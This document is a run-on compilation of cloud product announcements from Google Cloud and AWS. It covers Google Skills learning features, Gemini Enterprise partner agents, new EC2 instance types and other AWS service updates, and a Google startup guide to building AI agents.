For organizations, Google Skills makes it easier to keep your teams engaged and up to date. This is key: 74% of decision makers agree that technical learning resources improve employee productivity, and 71% of organizations realize revenue gains after engaging with these resources.1 In other words, more learning is a universal boon to business.
But learning alone isn’t enough. It needs to be fun, engaging and easy to fit into your schedule. That’s why we’re bringing new AI-powered and gamification features to Google Skills to make learning more effective.
Gamified features:
Leagues: Encourage friendly competition based on earned points with this dashboard widget.
Achievements: Celebrate your learning milestones with new visuals and easy options for social sharing.
Learning streaks: Promote consistent learning habits through bonus points and “streak freezes.”
GEAR: A new sprint to empower one million developers
Today, we’re also announcing the Gemini Enterprise Agent Ready (GEAR) program, a new educational sprint designed to empower one million developers on our new agentic platform, Gemini Enterprise. Through a cohort-based approach, we will help them build, deploy and manage agents, and as part of GEAR, developers can earn skill badges through Google Skills.
A direct path to employment; a faster way to hire
Building skills isn’t just good for individual careers — it’s also good for business. That’s why with Google Skills, we’re making it easier for people to get the skills employers are looking for, and for companies to find the talent they need to succeed.
Today, we’re announcing that for those who complete a Google Cloud Certificate in cybersecurity or data analytics in the U.S., there’s now a direct pathway to an interview with leading financial services firm Jack Henry. You’ll get to complete custom, hands-on labs that simulate the company’s real-world scenarios. These labs act as the first stage of the company’s hiring process, giving you a tangible way to showcase your skills and land a new job. We’re excited to expand the model to more Google Cloud customers in the future.
“We are excited for our collaboration with Google Cloud to reimagine talent acquisition. By leveraging Google Cloud Certificates, we have been able to more effectively identify and recruit top talent, helping to fuel our growth to fill critical skill gaps.” –Holly Novak, Chief People Officer, Jack Henry
This initiative is especially important because businesses are actively looking for talent. A recent study found that 82% prefer to recruit and hire professionals who hold these credentials.2
For Google Cloud customers interested in bringing on skilled individuals to your company, learn more about the program here.
We’re just getting started. Whether you’re an individual looking to get hired or a business leader aiming to upskill your teams, there’s something for everyone to thrive in this new world of AI.
Google Cloud believes the future of AI should be open, flexible, and interoperable. Today, with the launch of Gemini Enterprise – our new agentic platform that brings the best of Google AI to every employee, for every workflow – we’re introducing powerful new opportunities for partners to integrate their solutions and bring them to market.
Our AI ecosystem is already thriving, with thousands of partner-built agents available to Google Cloud customers today. More importantly, this curated set of agents has been validated by Google Cloud, ensuring customers have confidence in their quality and security as they use agents to transform their businesses.
Extending partner-built agents in Gemini Enterprise
Our goal is to make Gemini Enterprise the central destination for customers to access the agents they use daily, including those from leading technology and SaaS providers. With the combination of Gemini Enterprise and the Agent2Agent (A2A) protocol, agents can securely communicate and coordinate complex tasks with each other. Some of the partners announcing Gemini Enterprise-compatible agents today include:
Box: The Box AI agent lets users ask questions, summarize complex documents, extract data from files, and generate new content while respecting existing permissions in Box.
Dun & Bradstreet: D&B’s Look Up agent uses the D-U-N-S Number, a globally trusted identifier, to unify business data from internal and third-party sources for accurate and efficient integration across enterprise workflows.
Manhattan Associates: Manhattan’s Solution Navigator agent provides instant answers on Manhattan Active solutions, policies, and operations to accelerate response times and efficiency.
OpenText: Core Content Aviator simplifies content management, enabling users to search and summarize information with AI assistance, including document generation and multilingual translation.
Salesforce: Agents built on Agentforce and data from Slack will be accessible to users within Gemini Enterprise, enhancing their AI-powered productivity and business insights.
S&P Global: S&P’s Data Retrieval agent helps users analyze earnings calls, perform market research, and retrieve financial metrics–all with direct source citations.
ServiceNow: Enabled by A2A and ServiceNow AI Agent Fabric, ServiceNow AI Agents for Service Observability connects with Google Gemini-powered agents to detect, investigate, and recommend fixes for issues in customer cloud deployments – streamlining incident management, and enabling greater organizational agility.
Workday: Workday agents, such as its Self-Service Agent, deliver immediate insights and enable quick actions, like flagging potential budget overruns, submitting time off, creating HR cases, managing pay information, and more – all directly within the employee’s flow of work.
These and many other partners have committed to integrate their agents with Gemini Enterprise, including Amplitude, Avalara, CARTO, Cotality, Dynatrace, Elastic, Fullstory, HubSpot, Invideo, Optimizely, Orion by Gravity, Pegasystems, Quantum Metric, Supermetrics, Trase Systems, UiPath, and Vianai.
Discover validated agents using natural language search
In addition to deploying partner agents that integrate with Gemini Enterprise, customers can also now use a new, Gemini-powered AI agent finder – with natural language search – to help discover the right AI agents for their needs. Customers can search for agents from trusted vendors and filter by industry, use case, and whether they have been validated for A2A and deployment to Gemini Enterprise. These agents can then be purchased from Google Cloud Marketplace or directly through partners, and deployed into their environments.
This curated discovery experience is enabled by our enhanced AI agent ecosystem program and a rigorous framework for partners to validate their agents. We’ve also introduced the new “Google Cloud Ready – Gemini Enterprise” designation to recognize agents that meet our highest standards for performance and quality, helping accelerate adoption of trusted solutions and giving partners a new path to monetize their agents.
Growing partner services to help customers succeed with AI
Google Cloud remains partner-led in our professional services approach. With the launch of Gemini Enterprise today, our consulting partners are already expanding their services offerings to help customers accelerate their adoption of AI agents. In fact, many of these partners are already powering their own businesses with Gemini Enterprise. Major expansions include:
Accenture is driving successful adoption of Google Cloud’s AI technology with clients across industries; expanding agentic capabilities via the Accenture and Google Cloud generative AI Center of Excellence; and launching agents on Google Cloud Marketplace.
Deloitte is leveraging its “Agent Fleet” of live agents to help clients utilize Gemini Enterprise to deploy industry-tailored agents and co-innovate at scale.
Capgemini has developed a variety of agents with Google Cloud’s AI technology across sectors, which it will bring to Gemini Enterprise and the Google Cloud Marketplace.
Cognizant is accelerating agentic AI adoption for its clients and through internal use of Gemini Enterprise and by investing in Google Cloud Centers of Excellence around the globe.
GlobalLogic, a Hitachi Group Company, will adopt Gemini Enterprise internally and provide digital engineering services to accelerate customer adoption, including building AI Agents securely and at scale.
KPMG is using Gemini Enterprise to enhance the speed, accuracy, and quality of client delivery and to elevate the employee experience at KPMG with AI and agents, making everyday work easier.
PwC is advancing client AI transformation by combining its agent OS technology with Gemini Enterprise, including the deployment of agents it has used successfully internally.
Get started bringing agents to Gemini Enterprise
Gemini Enterprise is available today and includes access to thousands of agents from our ecosystem. Partners interested in learning more can visit the AI Agent Program page.
We’re committed to providing partners with the platform and resources needed to scale their AI agents on Gemini Enterprise, and we look forward to seeing the solutions they deliver to customers.
Today, we are excited to announce that Amazon SageMaker notebook instance supports Amazon Linux 2023. You can now choose Amazon Linux 2023 for your new Amazon SageMaker notebook instance to take advantage of the latest innovations, enhanced security features.
Amazon SageMaker notebook instances are fully managed Jupyter Notebooks with pre-configured development environments for data science and machine learning. Data scientists and developers can use SageMaker Notebooks to interactively explore, visualize and prepare data, and build and deploy machine learning models on SageMaker.
Amazon Linux 2023 (AL2023) is a general-purpose rpm-based Linux distribution and successor to Amazon Linux 2 (AL2). Amazon Linux 2023 simplifies operating system management through its secure, stable, and high-performance runtime environment. This Linux distribution follows a predictable two-year major release cycle with five years of long-term support. The first two years provide standard support with quarterly security patches, bug fixes, and new features, followed by three years of maintenance. Enhanced security features include SELinux support and FIPS 140-3 validation for cryptographic modules.
With this you now have the options to launch a notebook instance with AL2023 or AL2. For more details about this launch and instructions on how to get started with AL2023 notebook instances, please refer to the Amazon Linux 2023 documentation.
AWS is announcing Amazon EC2 I7ie instances are now available in AWS South America (São Paulo) region. Designed for large storage I/O intensive workloads, I7ie instances are powered by 5th Gen Intel Xeon Processors with an all-core turbo frequency of 3.2 GHz, offering up to 40% better compute performance and 20% better price performance over existing I3en instances. I7ie instances offer up to 120TB local NVMe storage density (highest in the cloud) for storage optimized instances and offer up to twice as many vCPUs and memory compared to prior generation instances. Powered by 3rd generation AWS Nitro SSDs, I7ie instances deliver up to 65% better real-time storage performance, up to 50% lower storage I/O latency, and 65% lower storage I/O latency variability compared to I3en instances.
I7ie are high density storage optimized instances, ideal for workloads requiring fast local storage with high random read/write performance at very low latency consistency to access large data sets. These instances are available in 9 different virtual sizes and deliver up to 100Gbps of network bandwidth and 60Gbps of bandwidth for Amazon Elastic Block Store (EBS).
AWS announces the general availability of new general-purpose Amazon EC2 M8a instances. M8a instances are powered by 5th Gen AMD EPYC processors (formerly code named Turin) with a maximum frequency of 4.5 GHz, deliver up to 30% higher performance, and up to 19% better price-performance compared to M7a instances.
M8a instances deliver 45% more memory bandwidth compared to M7a instances, making these instances ideal for even latency sensitive workloads. M8a instances deliver even higher performance gains for specific workloads. M8a instances are 60% faster for GroovyJVM benchmark, and up to 39% faster for Cassandra benchmark compared to Amazon EC2 M7a instances. M8a instances are SAP-certified and offer 12 sizes including 2 bare metal sizes. This range of instance sizes allows customers to precisely match their workload requirements.
M8a instances are built on the AWS Nitro System and ideal for applications that benefit from high performance and high throughput such as financial applications, gaming, rendering, application servers, simulation modeling, mid-size data stores, application development environments, and caching fleets.
M8a instances are available in the following AWS Regions: US East (Ohio), US West (Oregon), and Europe (Spain). To get started, sign in to the AWS Management Console. Customers can purchase these instances via Savings Plans, On-Demand instances, and Spot instances. For more information visit the Amazon EC2 M8a instance page or the AWS News blog.
Amazon Elastic Compute Cloud (Amazon EC2) R8gd instances with up to 11.4 TB of local NVMe-based SSD block-level storage are now available in Europe (Ireland), Asia Pacific (Sydney, Malaysia), South America (São Paulo), and Canada (Central) AWS Regions. These instances are powered by AWS Graviton4 processors, delivering up to 30% better performance over Graviton3-based instances. They have up to 40% higher performance for I/O intensive database workloads, and up to 20% faster query results for I/O intensive real-time data analytics than comparable AWS Graviton3-based instances. These instances are built on the AWS Nitro System and are a great fit for applications that need access to high-speed, low latency local storage.
Each instance is available in 12 different sizes. They provide up to 50 Gbps of network bandwidth and up to 40 Gbps of bandwidth to the Amazon Elastic Block Store (Amazon EBS). Additionally, customers can now adjust the network and Amazon EBS bandwidth on these instances by 25% using EC2 instance bandwidth weighting configuration, providing greater flexibility with the allocation of bandwidth resources to better optimize workloads. These instances offer Elastic Fabric Adapter (EFA) networking on 24xlarge, 48xlarge, metal-24xl, and metal-48xl sizes.
Amazon Elastic Compute Cloud (Amazon EC2) M8gd instances with up to 11.4 TB of local NVMe-based SSD block-level storage are now available in Europe (London), Asia Pacific (Sydney, Malaysia), and Canada (Central) AWS Regions. These instances are powered by AWS Graviton4 processors, delivering up to 30% better performance over Graviton3-based instances. They have up to 40% higher performance for I/O intensive database workloads, and up to 20% faster query results for I/O intensive real-time data analytics than comparable AWS Graviton3-based instances. These instances are built on the AWS Nitro System and are a great fit for applications that need access to high-speed, low latency local storage.
Each instance is available in 12 different sizes. They provide up to 50 Gbps of network bandwidth and up to 40 Gbps of bandwidth to the Amazon Elastic Block Store (Amazon EBS). Additionally, customers can now adjust the network and Amazon EBS bandwidth on these instances by 25% using EC2 instance bandwidth weighting configuration, providing greater flexibility with the allocation of bandwidth resources to better optimize workloads. These instances offer Elastic Fabric Adapter (EFA) networking on 24xlarge, 48xlarge, metal-24xl, and metal-48xl sizes.
Today, AWS announces a new pricing and cost estimation capability in Amazon Q Developer. Amazon Q Developer is the most capable generative AI-powered assistant for software development. With this launch, customers can now use Amazon Q Developer to get information about AWS product and service pricing, availability, and attributes, helping them select the right resources and estimate workload costs using natural language.
When architecting new workloads on AWS, customers need to estimate costs so they can evaluate cost/performance tradeoffs, set budgets, and plan future spending. Customers can now use Amazon Q Developer to retrieve detailed product attribute and pricing information using natural language, making it easier to estimate the cost of new workloads without having to review multiple pricing pages or specify detailed API request parameters. Customers can now ask questions about service pricing (e.g., “How much does RDS extended support cost?”), the cost of a planned workload (e.g., “I need to send 1 million notifications per month to email, and 1 million to HTTP/S endpoints. Estimate the monthly cost using SNS.”), or the relative costs of different resources (e.g., “What is the cost difference between an Application Load Balancer and a Network Load Balancer?”). To answer these questions, Amazon Q Developer retrieves information from the AWS Price List APIs.
Amazon Location Service has updated its mapping data to reflect Vietnam’s recent administrative reorganization, which consolidated the country’s provinces from 63 to 34 administrative units. This update enables customers in Vietnam to seamlessly align their operations with the new administrative structure that took effect July 1, 2025.
The update includes changes to Vietnam’s administrative boundaries, names, and hierarchical structure across all levels. The refresh incorporates the new structure of 34 provincial-level administrative units, consisting of 28 provinces and 6 centrally managed cities, along with consolidated commune-level administrative boundaries from 10,310 to 3,321 units. Place names and administrative components in Points of Interest (POI) have been updated while preserving street-level address accuracy.
This update supports use cases across industries such as logistics, e-commerce, and public services where accurate administrative boundary data is essential for operations like delivery zone planning, service area management, and address validation. The updated data is automatically available to customers querying Vietnam address data through Amazon Location Service.
Amazon Location Service enables developers to easily and securely add location data and mapping functionalities into applications. Amazon Location Service with GrabMaps service is available in Singapore and Malaysia regions. To learn more, check out our developer guide.
Amazon Elastic Compute Cloud (Amazon EC2) C8gd instances with up to 11.4 TB of local NVMe-based SSD block-level storage are now available in Europe (Ireland) and Asia Pacific (Sydney, Malaysia) AWS Regions. These instances are powered by AWS Graviton4 processors, delivering up to 30% better performance over Graviton3-based instances. They have up to 40% higher performance for I/O intensive database workloads, and up to 20% faster query results for I/O intensive real-time data analytics than comparable AWS Graviton3-based instances. These instances are built on the AWS Nitro System and are a great fit for applications that need access to high-speed, low latency local storage.
Each instance is available in 12 different sizes. They provide up to 50 Gbps of network bandwidth and up to 40 Gbps of bandwidth to the Amazon Elastic Block Store (Amazon EBS). Additionally, customers can now adjust the network and Amazon EBS bandwidth on these instances by 25% using EC2 instance bandwidth weighting configuration, providing greater flexibility with the allocation of bandwidth resources to better optimize workloads. These instances offer Elastic Fabric Adapter (EFA) networking on 24xlarge, 48xlarge, metal-24xl, and metal-48xl sizes.
Startups are using agentic AI to automate complex workflows, create novel user experiences, and solve business problems that were once considered technically impossible. Still, charting the optimal path forward — especially with the integration of AI agents — often presents significant technical complexity
To help startups navigate this new landscape, we’re launching our Startup technical guide: AI agents. It provides a systematic, operations-driven roadmap for embracing the potential of agentic systems.
What does this potential look like? AI agents combine the intelligence of advanced AI models with access to tools so they can take actions on your behalf, under your control. Unlike traditional AI, agentic AI can break down intricate tasks, refine plans, and dynamically utilize external resources and tools. The key takeaway is that AI agents can tackle complex, multi-step problems, ultimately transforming from a passive tool into a proactive problem-solver.
If your startup is looking to get in on the agentic AI action, here are some initial steps to consider. And when you’re ready to get building, you can get more details in our guide or even reach out to one of our AI experts at Google Cloud.
Choose your path: Build, use, or integrate
Every startup’s journey is unique, which is why Google Cloud offers a flexible agent ecosystem that supports the comprehensive development of agentic systems. You can:
Build your own agents: For teams that require a high degree of control over agent behavior, the open-source Agent Development Kit (ADK) is your go-to development framework. ADK is built for a custom, code-first approach, empowering developers to build, manage, evaluate, and deploy AI-powered agents. For an application-first approach, Google Agentspace orchestrates your entire AI workforce and empowers non-technical team members to build custom agents using a no-code designer.
Use Google Cloud agents: With rapid prototyping and easy ways to integrate AI into your existing apps, managed agents let you focus on core business logic rather than managing infrastructure. Gemini Code Assist is an AI-powered assistant for developers, while Gemini Cloud Assist is an AI expert for your Google Cloud environment.
Bring in partner agents: For more specialized use cases, you can easily integrate third-party or open-source agents into your stack via the Google Cloud Marketplace. You can also explore the Agent Garden to deploy prebuilt ADK agents that already support data reasoning and inter-agent collaboration.
The Startups technical guide: AI agents provides a complete roadmap for building production-ready AI agents. Here’s four core steps we’ve identified that can help define your first agent, using Agent Development Kit (ADK).
Step 1: Give your agent an identity
First, define your agent’s core identity. You’ll want to give it a unique name for logging and delegation, a clear description of its capabilities so other agents can route tasks to it, and identify the right AI foundation model (like Gemini 2.5 Pro or Gemma) to power its reasoning. Precision here is critical. The model you’re using treats every part of this definition as a prompt, and vague descriptions can lead to “context poisoning,” causing the agent to pursue incorrect goals.
Step 2: Write the “prime directive” with instructions
Next, give your agent its “prime directive” using the instruction parameter. This is where you define its persona, core objectives, and do’s and don’ts. Effective instructions clearly specify the desired outcomes for your agent, provide examples for complex tasks (e.g. few-shot prompting), and guide the agent on how to use its tools.
Step 3: Grant superpowers with tools
Transform your agent from a pure conversationalist into a system that can take action by equipping it with functions to call external APIs, search databases, or interact with other systems. In doing so, you grant it broader capabilities. For example, a bug assistant agent uses tools to fetch user details from a CRM or create a ticket in a project management system. Since the agent chooses which tool to use based on its name and description, making them clear and unique is crucial to avoid looping behaviors or incorrect actions.
Step 4: Master the lifecycle: test, deploy, operate
Building an agent is a continuous cycle, not a one-off task. Because agentic systems are non-deterministic, standard unit tests are insufficient. Our guide shows you how to evaluate an agent’s “trajectory” — its step-by-step reasoning — to ensure quality and reliability. This operational rigor, which we call AgentOps, is key to confidently deploying your agent on platforms like Vertex AI Agent Engine or Cloud Run and operating it safely in production.
Agents already in action
Startups are constantly innovating their agentic journeys , here’s a look at two startups that use Google Cloud’s models and architecture to run their agentic systems:
Actionable insights for better employee engagement
Wotter, a provider of next-generation Employee Engagement solutions, seeks to better understand what employees want and empower organizations with the insights they need to get the best out of their people by asking the right question to the right person at the right time.
Gemini 2.5 Flash was the right foundation model for Wotter’s smart assistant, blending speed with long-context reasoning. Wotter’s Flash models use agentic methods to manage extensive and ongoing sources of data, such as employee interactions and feedback, while still responding to queries on this data in seconds – and at a lower cost per query.
Eliminate a long-standing legal industry pain point
As people in the legal industry know too well, complex document reviews can ruin nights and weekends while turning focus away from strategic work. Enter Harvey, which is equipping legal professionals with domain-specific AI to maximize efficiency and keep legal professionals’ attention on activities that move the needle for their firms and clients.
Harvey evaluated several foundation models and ultimately found that Gemini 2.5 Pro achieved the leading score of 85.02% on its BigLaw Bench benchmark, the first of its kind to represent complex legal tasks. Gemini 2.5 Pro showcased strong reasoning across inputs consisting of hundreds of pages of materials—a common scenario in legal work. The model then used these materials to generate longer-form and comprehensive outputs, enabling deeper insights and analyses.
These core capabilities proved Gemini 2.5 Pro’s potential across complex legal work that requires reasoning over large sets of documents to support diligence, review, and use case drafting. Further, Vertex AI provides the stringent security and privacy guarantees that build trust in the Harvey platform among clientele. Gemini and Vertex AI are now an important part of Harvey’s vision for future product development.
Build what’s next, faster
The Startup technical guide: AI agents provides the blueprint your team needs to turn your vision into a production-ready reality. By using a code-first framework like ADK and the operational principles in this guide, you can move beyond informal “vibe-testing” to a rigorous, reliable process for building and managing your agent’s entire lifecycle. For your startup, this disciplined approach becomes a powerful competitive advantage.
With this feature, customers can selectively back up individual databases within a multi-database RDS for Db2 instance, enabling efficient migration of specific databases to another instance or on-premises environment. Using a simple backup command, customers can easily create database copies for development and testing environments, while also meeting their compliance requirements through separate backup copies. By backing up specific databases instead of full instance snapshots, customers can reduce their storage costs.
This feature is now available in all AWS Regions where Amazon RDS for Db2 is offered. For detailed information about configuring and using native database backups, visit the Amazon RDS for Db2 documentation. For pricing details, see the Amazon RDS pricing page.